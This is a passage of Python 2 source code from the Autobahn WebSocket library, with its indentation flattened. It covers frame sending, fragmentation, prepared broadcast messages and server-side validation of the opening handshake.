if self.onCloseFrame(code, reasonRaw):
return False
## PING frame
##
elif self.current_frame.opcode == 9:
self.onPing(payload)
## PONG frame
##
elif self.current_frame.opcode == 10:
self.onPong(payload)
else:
## we might arrive here, when protocolViolation
## wants us to continue anyway
pass
return True
def sendFrame(self, opcode, payload = "", fin = True, rsv = 0, mask = None, payload_len = None, chopsize = None, sync = False):
"""
Send out frame. Normally only used internally via sendMessage(), sendPing(), sendPong() and sendClose().
This method deliberately allows to send invalid frames (that is frames invalid
per-se, or frames invalid because of protocol state). Other than in fuzzing servers,
calling methods will ensure that no invalid frames are sent.
In addition, this method supports explicit specification of payload length.
When payload_len is given, it will always write that many octets to the stream.
It'll wrap within payload, resending parts of that when more octets were requested
The use case is again for fuzzing server which want to sent increasing amounts
of payload data to peers without having to construct potentially large messges
themselfes.
Modes: Hybi
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if payload_len is not None:
if len(payload) < 1:
raise Exception("cannot construct repeated payload with length %d from payload of length %d" % (payload_len, len(payload)))
l = payload_len
pl = ''.join([payload for k in range(payload_len / len(payload))]) + payload[:payload_len % len(payload)]
else:
l = len(payload)
pl = payload
## first byte
##
b0 = 0
if fin:
b0 |= (1 << 7)
b0 |= (rsv % 8) << 4
b0 |= opcode % 128
## second byte, payload len bytes and mask
##
b1 = 0
if mask or (not self.isServer and self.maskClientFrames) or (self.isServer and self.maskServerFrames):
b1 |= 1 << 7
if not mask:
mask = struct.pack("!I", random.getrandbits(32))
mv = mask
else:
mv = ""
## mask frame payload
##
if l > 0 and self.applyMask:
if l < WebSocketProtocol.PAYLOAD_LEN_XOR_BREAKEVEN:
masker = XorMaskerSimple(mask)
else:
masker = XorMaskerShifted1(mask)
plm = masker.process(pl)
else:
plm = pl
else:
mv = ""
plm = pl
el = ""
if l <= 125:
b1 |= l
elif l <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", l)
elif l <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", l)
else:
raise Exception("invalid payload length")
raw = ''.join([chr(b0), chr(b1), el, mv, plm])
if self.logFrames:
frameHeader = FrameHeader(opcode, fin, rsv, l, mask)
self.logTxFrame(frameHeader, payload, payload_len, chopsize, sync)
## send frame octets
##
self.sendData(raw, sync, chopsize)
def sendPing(self, payload = None):
"""
Send out Ping to peer. A peer is expected to Pong back the payload a soon
as "practical". When more than 1 Ping is outstanding at a peer, the peer may
elect to respond only to the last Ping.
Modes: Hybi
:param payload: An optional, arbitrary payload of length < 126 octets.
:type payload: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if payload:
l = len(payload)
if l > 125:
raise Exception("invalid payload for PING (payload length must be <= 125, was %d)" % l)
self.sendFrame(opcode = 9, payload = payload)
else:
self.sendFrame(opcode = 9)
def sendPong(self, payload = None):
"""
Send out Pong to peer. A Pong frame MAY be sent unsolicited.
This serves as a unidirectional heartbeat. A response to an unsolicited pong is "not expected".
Modes: Hybi
:param payload: An optional, arbitrary payload of length < 126 octets.
:type payload: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if payload:
l = len(payload)
if l > 125:
raise Exception("invalid payload for PONG (payload length must be <= 125, was %d)" % l)
self.sendFrame(opcode = 10, payload = payload)
else:
self.sendFrame(opcode = 10)
def sendCloseFrame(self, code = None, reasonUtf8 = None, isReply = False):
"""
Send a close frame and update protocol state. Note, that this is
an internal method which deliberately allows not send close
frame with invalid payload.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
- For Hixie mode, code and reasonUtf8 will be silently ignored.
"""
if self.state == WebSocketProtocol.STATE_CLOSING:
if self.debugCodePaths:
log.msg("ignoring sendCloseFrame since connection is closing")
elif self.state == WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("ignoring sendCloseFrame since connection already closed")
elif self.state == WebSocketProtocol.STATE_CONNECTING:
raise Exception("cannot close a connection not yet connected")
elif self.state == WebSocketProtocol.STATE_OPEN:
if self.websocket_version == 0:
self.sendData("\xff\x00")
else:
## construct Hybi close frame payload and send frame
payload = ""
if code is not None:
payload += struct.pack("!H", code)
if reasonUtf8 is not None:
payload += reasonUtf8
self.sendFrame(opcode = 8, payload = payload)
## update state
self.state = WebSocketProtocol.STATE_CLOSING
self.closedByMe = not isReply
## remember payload of close frame we sent
self.localCloseCode = code
self.localCloseReason = reasonUtf8
## drop connection when timeout on receiving close handshake reply
if self.closedByMe:
reactor.callLater(self.closeHandshakeTimeout, self.onCloseHandshakeTimeout)
else:
raise Exception("logic error")
def sendClose(self, code = None, reason = None):
"""
Starts a closing handshake.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, code and reason will be silently ignored.
:param code: An optional close status code (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_NORMAL or 3000-4999).
:type code: int
:param reason: An optional close reason (a string that when present, a status code MUST also be present).
:type reason: str
"""
if code is not None:
if type(code) != int:
raise Exception("invalid type %s for close code" % type(code))
if code != 1000 and not (code >= 3000 and code <= 4999):
raise Exception("invalid close code %d" % code)
if reason is not None:
if code is None:
raise Exception("close reason without close code")
if type(reason) not in [str, unicode]:
raise Exception("invalid type %s for close reason" % type(reason))
reasonUtf8 = reason.encode("UTF-8")
if len(reasonUtf8) + 2 > 125:
raise Exception("close reason too long (%d)" % len(reasonUtf8))
else:
reasonUtf8 = None
self.sendCloseFrame(code = code, reasonUtf8 = reasonUtf8, isReply = False)
def beginMessage(self, opcode = MESSAGE_TYPE_TEXT):
"""
Begin sending new message.
Modes: Hybi, Hixie
:param opcode: Message type, normally either WebSocketProtocol.MESSAGE_TYPE_TEXT (default) or
WebSocketProtocol.MESSAGE_TYPE_BINARY (only Hybi mode).
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state != WebSocketProtocol.SEND_STATE_GROUND:
raise Exception("WebSocketProtocol.beginMessage invalid in current sending state")
if self.websocket_version == 0:
if opcode != 1:
raise Exception("cannot send non-text message in Hixie mode")
self.sendData('\x00')
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
else:
if opcode not in [1, 2]:
raise Exception("use of reserved opcode %d" % opcode)
## remember opcode for later (when sending first frame)
##
self.send_message_opcode = opcode
self.send_state = WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN
def beginMessageFrame(self, length, reserved = 0, mask = None):
"""
Begin sending new message frame.
Modes: Hybi
:param length: Length of frame which is started. Must be >= 0 and <= 2^63.
:type length: int
:param reserved: Reserved bits for frame (an integer from 0 to 7). Note that reserved != 0 is only legal when an extension has been negoiated which defines semantics.
:type reserved: int
:param mask: Optional frame mask. When given, this is used. When None and the peer is a client, a mask will be internally generated. For servers None is default.
:type mask: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state not in [WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN, WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE]:
raise Exception("WebSocketProtocol.beginMessageFrame invalid in current sending state")
if (not type(length) in [int, long]) or length < 0 or length > 0x7FFFFFFFFFFFFFFF: # 2**63
raise Exception("invalid value for message frame length")
if type(reserved) is not int or reserved < 0 or reserved > 7:
raise Exception("invalid value for reserved bits")
self.send_message_frame_length = length
if mask:
## explicit mask given
##
assert type(mask) == str
assert len(mask) == 4
self.send_message_frame_mask = mask
elif (not self.isServer and self.maskClientFrames) or (self.isServer and self.maskServerFrames):
## automatic mask:
## - client-to-server masking (if not deactivated)
## - server-to-client masking (if activated)
##
self.send_message_frame_mask = struct.pack("!I", random.getrandbits(32))
else:
## no mask
##
self.send_message_frame_mask = None
## payload masker
##
if self.send_message_frame_mask and length > 0 and self.applyMask:
if length < WebSocketProtocol.PAYLOAD_LEN_XOR_BREAKEVEN:
self.send_message_frame_masker = XorMaskerSimple(self.send_message_frame_mask)
else:
self.send_message_frame_masker = XorMaskerShifted1(self.send_message_frame_mask)
else:
self.send_message_frame_masker = XorMaskerNull()
## first byte
##
b0 = (reserved % 8) << 4 # FIN = false .. since with streaming, we don't know when message ends
if self.send_state == WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN:
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
b0 |= self.send_message_opcode % 128
else:
pass # message continuation frame
## second byte, payload len bytes and mask
##
b1 = 0
if self.send_message_frame_mask:
b1 |= 1 << 7
mv = self.send_message_frame_mask
else:
mv = ""
el = ""
if length <= 125:
b1 |= length
elif length <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", length)
elif length <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", length)
else:
raise Exception("invalid payload length")
## write message frame header
##
header = ''.join([chr(b0), chr(b1), el, mv])
self.sendData(header)
## now we are inside message frame ..
##
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE_FRAME
def sendMessageFrameData(self, payload, sync = False):
"""
Send out data when within message frame (message was begun, frame was begun).
Note that the frame is automatically ended when enough data has been sent
that is, there is no endMessageFrame, since you have begun the frame specifying
the frame length, which implicitly defined the frame end. This is different from
messages, which you begin and end, since a message can contain an unlimited number
of frames.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
:param payload: Data to send.
:returns: int -- Hybi mode: when frame still incomplete, returns outstanding octets, when frame complete, returns <= 0, when < 0, the amount of unconsumed data in payload argument. Hixie mode: returns None.
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
## Hixie Mode
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE:
raise Exception("WebSocketProtocol.sendMessageFrameData invalid in current sending state")
self.sendData(payload, sync = sync)
return None
else:
## Hybi Mode
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE_FRAME:
raise Exception("WebSocketProtocol.sendMessageFrameData invalid in current sending state")
rl = len(payload)
if self.send_message_frame_masker.pointer() + rl > self.send_message_frame_length:
l = self.send_message_frame_length - self.send_message_frame_masker.pointer()
rest = -(rl - l)
pl = payload[:l]
else:
l = rl
rest = self.send_message_frame_length - self.send_message_frame_masker.pointer() - l
pl = payload
## mask frame payload
##
plm = self.send_message_frame_masker.process(pl)
## send frame payload
##
self.sendData(plm, sync = sync)
## if we are done with frame, move back into "inside message" state
##
if self.send_message_frame_masker.pointer() >= self.send_message_frame_length:
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
## when =0 : frame was completed exactly
## when >0 : frame is still uncomplete and that much amount is still left to complete the frame
## when <0 : frame was completed and there was this much unconsumed data in payload argument
##
return rest
def endMessage(self):
"""
End a previously begun message. No more frames may be sent (for that message). You have to
begin a new message before sending again.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE:
raise Exception("WebSocketProtocol.endMessage invalid in current sending state [%d]" % self.send_state)
if self.websocket_version == 0:
self.sendData('\x00')
else:
self.sendFrame(opcode = 0, fin = True)
self.send_state = WebSocketProtocol.SEND_STATE_GROUND
def sendMessageFrame(self, payload, reserved = 0, mask = None, sync = False):
"""
When a message has begun, send a complete message frame in one go.
Modes: Hybi
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
self.beginMessageFrame(len(payload), reserved, mask)
self.sendMessageFrameData(payload, sync)
def sendMessage(self, payload, binary = False, payload_frag_size = None, sync = False):
"""
Send out a message in one go.
You can send text or binary message, and optionally specifiy a payload fragment size.
When the latter is given, the payload will be split up into frames with
payload <= the payload_frag_size given.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
if binary:
raise Exception("cannot send binary message in Hixie76 mode")
if payload_frag_size:
raise Exception("cannot fragment messages in Hixie76 mode")
self.sendMessageHixie76(payload, sync)
else:
self.sendMessageHybi(payload, binary, payload_frag_size, sync)
def sendMessageHixie76(self, payload, sync = False):
"""
Hixie76-Variant of sendMessage().
Modes: Hixie
"""
self.sendData('\x00' + payload + '\xff', sync = sync)
def sendMessageHybi(self, payload, binary = False, payload_frag_size = None, sync = False):
"""
Hybi-Variant of sendMessage().
Modes: Hybi
"""
## (initial) frame opcode
##
if binary:
opcode = 2
else:
opcode = 1
## explicit payload_frag_size arguments overrides autoFragmentSize setting
##
if payload_frag_size is not None:
pfs = payload_frag_size
else:
if self.autoFragmentSize > 0:
pfs = self.autoFragmentSize
else:
pfs = None
## send unfragmented
##
if pfs is None or len(payload) <= pfs:
self.sendFrame(opcode = opcode, payload = payload, sync = sync)
## send data message in fragments
##
else:
if pfs < 1:
raise Exception("payload fragment size must be at least 1 (was %d)" % pfs)
n = len(payload)
i = 0
done = False
first = True
while not done:
j = i + pfs
if j > n:
done = True
j = n
if first:
self.sendFrame(opcode = opcode, payload = payload[i:j], fin = done, sync = sync)
first = False
else:
self.sendFrame(opcode = 0, payload = payload[i:j], fin = done, sync = sync)
i += pfs
class PreparedMessage:
"""
Encapsulates a prepared message to be sent later once or multiple
times. This is used for optimizing Broadcast/PubSub.
The message serialization formats currently created internally are:
* Hybi
* Hixie
The construction of different formats is needed, since we support
mixed clients (speaking different protocol versions).
It will also be the place to add a 3rd format, when we support
the deflate extension, since then, the clients will be mixed
between Hybi-Deflate-Unsupported, Hybi-Deflate-Supported and Hixie.
"""
def __init__(self, payload, binary, masked):
self.initHixie(payload, binary)
self.initHybi(payload, binary, masked)
def initHixie(self, payload, binary):
if binary:
# silently filter out .. probably do something else:
# base64?
# dunno
self.payloadHixie = ''
else:
self.payloadHixie = '\x00' + payload + '\xff'
def initHybi(self, payload, binary, masked):
l = len(payload)
## first byte
##
b0 = ((1 << 7) | 2) if binary else ((1 << 7) | 1)
## second byte, payload len bytes and mask
##
if masked:
b1 = 1 << 7
mask = struct.pack("!I", random.getrandbits(32))
if l == 0:
plm = payload
elif l < WebSocketProtocol.PAYLOAD_LEN_XOR_BREAKEVEN:
plm = XorMaskerSimple(mask).process(payload)
else:
plm = XorMaskerShifted1(mask).process(payload)
else:
b1 = 0
mask = ""
plm = payload
## payload extended length
##
el = ""
if l <= 125:
b1 |= l
elif l <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", l)
elif l <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", l)
else:
raise Exception("invalid payload length")
## raw WS message (single frame)
##
self.payloadHybi = ''.join([chr(b0), chr(b1), el, mask, plm])
class WebSocketFactory:
"""
Mixin for WebSocketClientFactory and WebSocketServerFactory.
"""
def prepareMessage(self, payload, binary = False, masked = None):
"""
Prepare a WebSocket message. This can be later used on multiple
instances of WebSocketProtocol using sendPreparedMessage().
By doing so, you can avoid the (small) overhead of framing the
_same_ payload into WS messages when that payload is to be sent
out on multiple connections.
Modes: Hybi, Hixie
Caveats:
1) Only use when you know what you are doing. I.e. calling
sendPreparedMessage() on the _same_ protocol instance multiples
times with the same prepared message might break the spec.
Since i.e. the frame mask will be the same!
2) Treat the object returned as opaque. It may change!
"""
if masked is None:
masked = not self.isServer
return PreparedMessage(payload, binary, masked)
class WebSocketServerProtocol(WebSocketProtocol):
"""
A Twisted protocol for WebSockets servers.
"""
def onConnect(self, connectionRequest):
"""
Callback fired during WebSocket opening handshake when new WebSocket client
connection is about to be established.
Throw HttpException when you don't want to accept the WebSocket
connection request. For example, throw a
HttpException(httpstatus.HTTP_STATUS_CODE_UNAUTHORIZED[0], "You are not authorized for this!").
When you want to accept the connection, return the accepted protocol
from list of WebSockets (sub)protocols provided by client or None to
speak no specific one or when the client list was empty.
:param connectionRequest: WebSocket connection request information.
:type connectionRequest: instance of :class:`autobahn.websocket.ConnectionRequest`
"""
return None
def connectionMade(self):
"""
Called by Twisted when new TCP connection from client was accepted. Default
implementation will prepare for initial WebSocket opening handshake.
When overriding in derived class, make sure to call this base class
implementation _before_ your code.
"""
self.isServer = True
WebSocketProtocol.connectionMade(self)
self.factory.countConnections += 1
if self.debug:
log.msg("connection accepted from peer %s" % self.peerstr)
def connectionLost(self, reason):
"""
Called by Twisted when established TCP connection from client was lost. Default
implementation will tear down all state properly.
When overriding in derived class, make sure to call this base class
implementation _after_ your code.
"""
WebSocketProtocol.connectionLost(self, reason)
self.factory.countConnections -= 1
if self.debug:
log.msg("connection from %s lost" % self.peerstr)
def parseHixie76Key(self, key):
return int(filter(lambda x: x.isdigit(), key)) / key.count(" ")
def processHandshake(self):
"""
Process WebSockets opening handshake request from client.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
self.http_request_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP request:\n\n%s\n\n" % self.http_request_data)
## extract HTTP status line and headers
##
(self.http_status_line, self.http_headers, http_headers_cnt) = parseHttpHeader(self.http_request_data)
## validate WebSocket opening handshake client request
##
if self.debug:
log.msg("received HTTP status line in opening handshake : %s" % str(self.http_status_line))
log.msg("received HTTP headers in opening handshake : %s" % str(self.http_headers))
## HTTP Request line : METHOD, VERSION
##
rl = self.http_status_line.split()
if len(rl) != 3:
return self.failHandshake("Bad HTTP request status line '%s'" % self.http_status_line)
if rl[0].strip() != "GET":
return self.failHandshake("HTTP method '%s' not allowed" % rl[0], HTTP_STATUS_CODE_METHOD_NOT_ALLOWED[0])
vs = rl[2].strip().split("/")
if len(vs) != 2 or vs[0] != "HTTP" or vs[1] not in ["1.1"]:
return self.failHandshake("Unsupported HTTP version '%s'" % rl[2], HTTP_STATUS_CODE_UNSUPPORTED_HTTP_VERSION[0])
## HTTP Request line : REQUEST-URI
##
self.http_request_uri = rl[1].strip()
try:
(scheme, netloc, path, params, query, fragment) = urlparse.urlparse(self.http_request_uri)
## FIXME: check that if absolute resource URI is given,
## the scheme/netloc matches the server
if scheme != "" or netloc != "":
pass
## Fragment identifiers are meaningless in the context of WebSocket
## URIs, and MUST NOT be used on these URIs.
if fragment != "":
return self.failHandshake("HTTP requested resource contains a fragment identifier '%s'" % fragment)
## resource path and query parameters .. this will get forwarded
## to onConnect()
self.http_request_path = path
self.http_request_params = urlparse.parse_qs(query)
except:
return self.failHandshake("Bad HTTP request resource - could not parse '%s'" % rl[1].strip())
## Host
##
if not self.http_headers.has_key("host"):
return self.failHandshake("HTTP Host header missing in opening handshake request")
if http_headers_cnt["host"] > 1:
return self.failHandshake("HTTP Host header appears more than once in opening handshake request")
self.http_request_host = self.http_headers["host"].strip()
if self.http_request_host.find(":") >= 0:
(h, p) = self.http_request_host.split(":")
try:
port = int(str(p.strip()))
except:
return self.failHandshake("invalid port '%s' in HTTP Host header '%s'" % (str(p.strip()), str(self.http_request_host)))
if port != self.factory.port:
return self.failHandshake("port %d in HTTP Host header '%s' does not match server listening port %s" % (port, str(self.http_request_host), self.factory.port))
self.http_request_host = h
else:
if not ((self.factory.isSecure and self.factory.port == 443) or (not self.factory.isSecure and self.factory.port == 80)):
return self.failHandshake("missing port in HTTP Host header '%s' and server runs on non-standard port %d (wss = %s)" % (str(self.http_request_host), self.factory.port, self.factory.isSecure))
## Upgrade
##
if not self.http_headers.has_key("upgrade"):
## When no WS upgrade, render HTML server status page
##
if self.webStatus:
self.sendServerStatus()
self.dropConnection(abort = False)
return
else:
return self.failHandshake("HTTP Upgrade header missing", HTTP_STATUS_CODE_UPGRADE_REQUIRED[0])
upgradeWebSocket = False
for u in self.http_headers["upgrade"].split(","):
if u.strip().lower() == "websocket":
upgradeWebSocket = True
break
if not upgradeWebSocket:
return self.failHandshake("HTTP Upgrade headers do not include 'websocket' value (case-insensitive) : %s" % self.http_headers["upgrade"])
## Connection
##
if not self.http_headers.has_key("connection"):
return self.failHandshake("HTTP Connection header missing")
connectionUpgrade = False
for c in self.http_headers["connection"].split(","):
if c.strip().lower() == "upgrade":
connectionUpgrade = True
break
if not connectionUpgrade:
return self.failHandshake("HTTP Connection headers do not include 'upgrade' value (case-insensitive) : %s" % self.http_headers["connection"])
## Sec-WebSocket-Version PLUS determine mode: Hybi or Hixie
##
if not self.http_headers.has_key("sec-websocket-version"):
if self.debugCodePaths:
log.msg("Hixie76 protocol detected")
if self.allowHixie76:
version = 0
else:
return self.failHandshake("WebSocket connection denied - Hixie76 protocol mode disabled.")
else:
if self.debugCodePaths:
log.msg("Hybi protocol detected")
if http_headers_cnt["sec-websocket-version"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Version header appears more than once in opening handshake request")
try:
version = int(self.http_headers["sec-websocket-version"])
except:
return self.failHandshake("could not parse HTTP Sec-WebSocket-Version header '%s' in opening handshake request" % self.http_headers["sec-websocket-version"])
if version not in self.versions:
## respond with list of supported versions (descending order)
##
sv = sorted(self.versions)
sv.reverse()
svs = ','.join([str(x) for x in sv])
return self.failHandshake("WebSocket version %d not supported (supported versions: %s)" % (version, svs),
HTTP_STATUS_CODE_BAD_REQUEST[0],
[("Sec-WebSocket-Version", svs)])
else:
## store the protocol version we are supposed to talk
self.websocket_version = version
## Sec-WebSocket-Protocol
##
if self.http_headers.has_key("sec-websocket-protocol"):
protocols = [str(x.strip()) for x in self.http_headers["sec-websocket-protocol"].split(",")]
# check for duplicates in protocol header
pp = {}
for p in protocols:
if pp.has_key(p):
return self.failHandshake("duplicate protocol '%s' specified in HTTP Sec-WebSocket-Protocol header" % p)
else:
pp[p] = 1
# ok, no duplicates, save list in order the client sent it
self.websocket_protocols = protocols
else:
self.websocket_protocols = []
## Origin / Sec-WebSocket-Origin
## http://tools.ietf.org/html/draft-ietf-websec-origin-02
##
if self.websocket_version < 13 and self.websocket_version != 0:
# Hybi, but only < Hybi-13
websocket_origin_header_key = 'sec-websocket-origin'
else:
# RFC6455, >= Hybi-13 and Hixie
websocket_origin_header_key = "origin"
self.websocket_origin = None
if self.http_headers.has_key(websocket_origin_header_key):
if http_headers_cnt[websocket_origin_header_key] > 1:
return self.failHandshake("HTTP Origin header appears more than once in opening handshake request")
self.websocket_origin = self.http_headers[websocket_origin_header_key].strip()
else:
# non-browser clients are allowed to omit this header
pass
## Sec-WebSocket-Extensions
##
## extensions requested by client
self.websocket_extensions = []
## extensions selected by server
self.websocket_extensions_in_use = []
if self.http_headers.has_key("sec-websocket-extensions"):
if self.websocket_version == 0:
return self.failHandshake("Sec-WebSocket-Extensions header specified for Hixie-76")
extensions = [x.strip() for x in self.http_headers["sec-websocket-extensions"].split(',')]
if len(extensions) > 0:
self.websocket_extensions = extensions
if self.debug:
log.msg("client requested extensions we don't support (%s)" % str(extensions))
## Sec-WebSocket-Key (Hybi) or Sec-WebSocket-Key1/Sec-WebSocket-Key2 (Hixie-76)
##
if self.websocket_version == 0:
for kk in ['Sec-WebSocket-Key1', 'Sec-WebSocket-Key2']:
k = kk.lower()
if not self.http_headers.has_key(k):
return self.failHandshake("HTTP %s header missing" % kk)
if http_headers_cnt[k] > 1:
return self.failHandshake("HTTP %s header appears more than once in opening handshake request" % kk)
try:
key1 = self.parseHixie76Key(self.http_headers["sec-websocket-key1"].strip())
key2 = self.parseHixie76Key(self.http_headers["sec-websocket-key2"].strip())
except:
return self.failHandshake("could not parse Sec-WebSocket-Key1/2")
else:
if not self.http_headers.has_key("sec-websocket-key"):
return self.failHandshake("HTTP Sec-WebSocket-Key header missing")
if http_headers_cnt["sec-websocket-key"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Key header appears more than once in opening handshake request")
key = self.http_headers["sec-websocket-key"].strip()
if len(key) != 24: # 16 bytes => (ceil(128/24)*24)/6 == 24
return self.failHandshake("bad Sec-WebSocket-Key (length must be 24 ASCII chars) '%s'" % key)
if key[-2:] != "==": # 24 - ceil(128/6) == 2
return self.failHandshake("bad Sec-WebSocket-Key (invalid base64 encoding) '%s'" % key)
for c in key[:-2]:
if c not in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/":
return self.failHandshake("bad character '%s' in Sec-WebSocket-Key (invalid base64 encoding) '%s'" (c, key))
## For Hixie-76, we need 8 octets of HTTP request body to complete HS!
##
if self.websocket_version == 0:
if len(self.data) < end_of_header + 4 + 8:
return
else:
key3 = self.data[end_of_header + 4:end_of_header + 4 + 8]
## Ok, got complete HS input, remember rest (if any)
##
if self.websocket_version == 0:
self.data = self.data[end_of_header + 4 + 8:]
else:
self.data = self.data[end_of_header + 4:]
## WebSocket handshake validated => produce opening handshake response
## Now fire onConnect() on derived class, to give that class a chance to accept or deny
## the connection. onConnect() may throw, in which case the connection is denied, or it
## may return a protocol from the protocols provided by client or None.
##
try:
connectionRequest = ConnectionRequest(self.peer,
self.peerstr,
self.http_headers,
self.http_request_host,
self.http_request_path,
self.http_request_params,
self.websocket_version,
self.websocket_origin,
self.websocket_protocols,
self.websocket_extensions)
## onConnect() will return the selected subprotocol or None
## or raise an HttpException
##
protocol = self.onConnect(connectionRequest)
if protocol is not None and not (protocol in self.websocket_protocols):
raise Exception("protocol accepted must be from the list client sent or None")
self.websocket_protocol_in_use = protocol
except HttpException, e:
return self.failHandshake(e.reason, e.code)
#return self.sendHttpRequestFailure(e.code, e.reason)
except Exception, e:
log.msg("Exception raised in onConnect() - %s" % str(e))
return self.failHandshake("Internal Server Error", HTTP_STATUS_CODE_INTERNAL_SERVER_ERROR[0])
## build response to complete WebSocket handshake
##
response = "HTTP/1.1 %d Switching Protocols\x0d\x0a" % HTTP_STATUS_CODE_SWITCHING_PROTOCOLS[0]
if self.factory.server is not None and self.factory.server != "":
response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Upgrade: WebSocket\x0d\x0a"
response += "Connection: Upgrade\x0d\x0a"
if self.websocket_protocol_in_use is not None:
response += "Sec-WebSocket-Protocol: %s\x0d\x0a" % str(self.websocket_protocol_in_use)
if self.websocket_version == 0:
if self.websocket_origin:
## browser client provide the header, and expect it to be echo'ed
response += "Sec-WebSocket-Origin: %s\x0d\x0a" % str(self.websocket_origin)
if self.debugCodePaths:
log.msg('factory isSecure = %s port = %s' % (self.factory.isSecure, self.factory.port))
if (self.factory.isSecure and self.factory.port != 443) or ((not self.factory.isSecure) and self.factory.port != 80):
if self.debugCodePaths:
log.msg('factory running on non-default port')
response_port = ':' + str(self.factory.port)
else:
if self.debugCodePaths:
log.msg('factory running on default port')
response_port = ''
## FIXME: check this! But see below ..
if False:
response_host = str(self.factory.host)
response_path = str(self.factory.path)
else:
response_host = str(self.http_request_host)
response_path = str(self.http_request_uri)
location = "%s://%s%s%s" % ('wss' if self.factory.isSecure else 'ws', response_host, response_port, response_path)
# Safari is very picky about this one
response += "Sec-WebSocket-Location: %s\x0d\x0a" % location
## end of HTTP response headers
response += "\x0d\x0a"
## compute accept body
##
accept_val = struct.pack(">II", key1, key2) + key3
accept = hashlib.md5(accept_val).digest()
response_body = str(accept)
else:
## compute Sec-WebSocket-Accept
##
sha1 = hashlib.sha1()
sha1.update(key + WebSocketProtocol.WS_MAGIC)
sec_websocket_accept = base64.b64encode(sha1.digest())
response += "Sec-WebSocket-Accept: %s\x0d\x0a" % sec_websocket_accept
if len(self.websocket_extensions_in_use) > 0:
response += "Sec-WebSocket-Extensions: %s\x0d\x0a" % ','.join(self.websocket_extensions_in_use)
## end of HTTP response headers
response += "\x0d\x0a"
response_body = ''
if self.debug:
log.msg("sending HTTP response:\n\n%s%s\n\n" % (response, binascii.b2a_hex(response_body)))
## save and send out opening HS data
##
self.http_response_data = response + response_body
self.sendData(self.http_response_data)
## opening handshake completed, move WebSockets connection into OPEN state
##
self.state = WebSocketProtocol.STATE_OPEN
self.inside_message = False
if self.websocket_version != 0:
self.current_frame = None
## fire handler on derived class
##
self.onOpen()
## process rest, if any
##
if len(self.data) > 0:
self.consumeData()
def failHandshake(self, reason, code = HTTP_STATUS_CODE_BAD_REQUEST[0], responseHeaders = []):
"""
During opening handshake the client request was invalid, we send a HTTP
error response and then drop the connection.
"""
if self.debug:
log.msg("failing WebSockets opening handshake ('%s')" % reason)
self.sendHttpErrorResponse(code, reason, responseHeaders)
self.dropConnection(abort = False)
def sendHttpErrorResponse(self, code, reason, responseHeaders = []):
"""
Send out HTTP error response.
"""
response = "HTTP/1.1 %d %s\x0d\x0a" % (code, reason.encode("utf-8"))
for h in responseHeaders:
response += "%s: %s\x0d\x0a" % (h[0], h[1].encode("utf-8"))
response += "\x0d\x0a"
self.sendData(response)
def sendHtml(self, html):
raw = html.encode("utf-8")
response = "HTTP/1.1 %d %s\x0d\x0a" % (HTTP_STATUS_CODE_OK[0], HTTP_STATUS_CODE_OK[1])
if self.factory.server is not None and self.factory.server != "":
response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Content-Type: text/html; charset=UTF-8\x0d\x0a"
response += "Content-Length: %d\x0d\x0a" % len(raw)
response += "\x0d\x0a"
response += raw
self.sendData(response)
def sendServerStatus(self):
"""
Used to send out server status/version upon receiving a HTTP/GET without
upgrade to WebSocket header (and option serverStatus is True).
"""
html = """
<!DOCTYPE html>
<html>
<body>
<h1>Autobahn WebSockets %s</h1>
<p>
I am not Web server, but a WebSocket endpoint.
You can talk to me using the WebSocket <a href="http://tools.ietf.org/html/rfc6455">protocol</a>.
</p>
<p>
For more information, please visit <a href="http://autobahn.ws">my homepage</a>.
</p>
</body>
</html>
""" % str(autobahn.version)
